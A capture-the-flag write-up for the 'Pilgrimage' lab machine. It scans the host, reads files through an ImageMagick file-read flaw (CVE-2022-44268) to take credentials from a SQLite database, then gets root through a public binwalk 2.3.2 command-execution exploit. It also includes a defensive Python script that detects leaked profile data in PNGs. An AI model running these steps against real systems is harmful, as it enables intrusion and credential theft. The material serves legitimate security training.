Pilgrimage

User flag

Initial nmap:

$ nmap -sC -sV pilgrimage.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 22:52 CDT
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-title: Pilgrimage - Shrink Your Images
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.20 seconds

The website has an exposed .git directory, so git-dumper was used to see what was there.

There was no source code in it, but .git/COMMIT_EDITMSG showed that there was a magick file, which looked interesting, so that binary was downloaded from the website.

Running ./magick -version reports version 7.1.0-49, which is vulnerable:

$ searchsploit imagemagick 7.1.0
------------------------------------------ --------------------------
 Exploit Title                            |  Path
------------------------------------------ --------------------------
ImageMagick 7.1.0-49 - Arbitrary File Rea | multiple/local/51261.txt
ImageMagick 7.1.0-49 - DoS                | php/dos/51256.txt
------------------------------------------ --------------------------
Shellcodes: No Results

Got PoC from https://github.com/voidz0r/CVE-2022-44268

$ cargo run "/var/www/pilgrimage.htb/index.php"

Upload the file, then download the resulting image and examine it using the instructions from the PoC.

The source shows that a database is being accessed, so try reading that as well:

$ cargo run "/var/db/pilgrimage"

Extracting this file using the PoC's instructions didn't produce a sensible file, but converting the hex dump to binary as described at https://unix.stackexchange.com/questions/279505/convert-hexadecimal-to-binary-on-linux-cli produced a file that worked:

$ cat hexdata.txt | xxd -r -p > pilgrimage
$ file pilgrimage 
pilgrimage: SQLite 3.x database, last written using SQLite version 3034001, file counter 84, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 84
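The "examine it" and xxd steps above both come down to pulling hex out of a PNG text chunk. As an added example (not from the writeup or the PoC), here is a check a defender could run over the images such a service emits: it walks the PNG chunks, flags any tEXt/zTXt chunk whose keyword starts with "Raw profile type" (where ImageMagick stores profile data), and decodes the hex rows the way xxd -r -p does. The sample PNG, its "leaked" content and the helper names are constructed for the example.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_chunks(data):
    """Yield (type, payload) for each chunk of a PNG byte string."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + payload + 4 CRC

def raw_profiles(data):
    """Return {keyword: decoded bytes} for every 'Raw profile type' text chunk.
    ImageMagick stores these as "\\n<name>\\n<length>\\n<hex rows>"; everything
    after the third newline is hex, which is what xxd -r -p turns back into bytes."""
    found = {}
    for ctype, payload in png_chunks(data):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, text = payload.partition(b"\x00")
        if not keyword.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            text = zlib.decompress(text[1:])  # first byte is the compression method
        hexdata = re.sub(rb"[^0-9A-Fa-f]", b"", b"\n".join(text.split(b"\n")[3:]))
        found[keyword.decode()] = bytes.fromhex(hexdata.decode())
    return found

def _chunk(ctype, payload):
    """Encode one PNG chunk with its CRC (used only to build the constructed samples)."""
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

# Constructed samples: header-only 1x1 PNGs, one carrying a hex-encoded "leaked" file.
SECRET = b"<?php // constructed sample, not a real file\n"
_hex = SECRET.hex().encode()
_profile = b"\nprofile\n%8d\n" % len(SECRET) + b"\n".join(_hex[i:i + 72] for i in range(0, len(_hex), 72))
_IHDR = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
SAMPLE_PNG = PNG_SIG + _IHDR + _chunk(b"tEXt", b"Raw profile type profile\x00" + _profile) + _chunk(b"IEND", b"")
SAMPLE_ZTXT = PNG_SIG + _IHDR + _chunk(b"zTXt", b"Raw profile type profile\x00\x00" + zlib.compress(_profile)) + _chunk(b"IEND", b"")
CLEAN_PNG = PNG_SIG + _IHDR + _chunk(b"IEND", b"")

if __name__ == "__main__":
    for keyword, content in raw_profiles(SAMPLE_PNG).items():
        print(f"{keyword}: {len(content)} bytes embedded -> {content!r}")
```

Any non-empty result on an image the service produced is the signal to look for; the clean sample returns an empty dict.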

Looking at the database with sqlitebrowser showed a table with a username and password. Then ssh in as emily to get the flag.

Root flag

Root is running /usr/sbin/malwarescan.sh, which runs binwalk every time a file is created in /var/www/pilgrimage.htb/shrunk/, so anything written there is parsed by a root process. Looking for the installed binwalk shows that it's an older version:

$ find / -name '*binwalk*' 2>/dev/null
/usr/local/lib/python3.9/dist-packages/binwalk-2.3.2.egg-info
/usr/local/lib/python3.9/dist-packages/binwalk
/usr/local/lib/python3.9/dist-packages/binwalk/magic/binwalk
/usr/local/bin/binwalk
/home/emily/.config/binwalk

There is an RCE exploit available for this version:

$ searchsploit binwalk 2.3.2
------------------------------------------ --------------------------
 Exploit Title                            |  Path
------------------------------------------ --------------------------
Binwalk v2.3.2 - Remote Command Execution | python/remote/51249.py
------------------------------------------ --------------------------
Shellcodes: No Results

This exploit was copied onto the box, and the emily user was used to write its output directly into that directory (going through the upload won't work, because the service resizes the image). The shell could then be caught and the root flag obtained.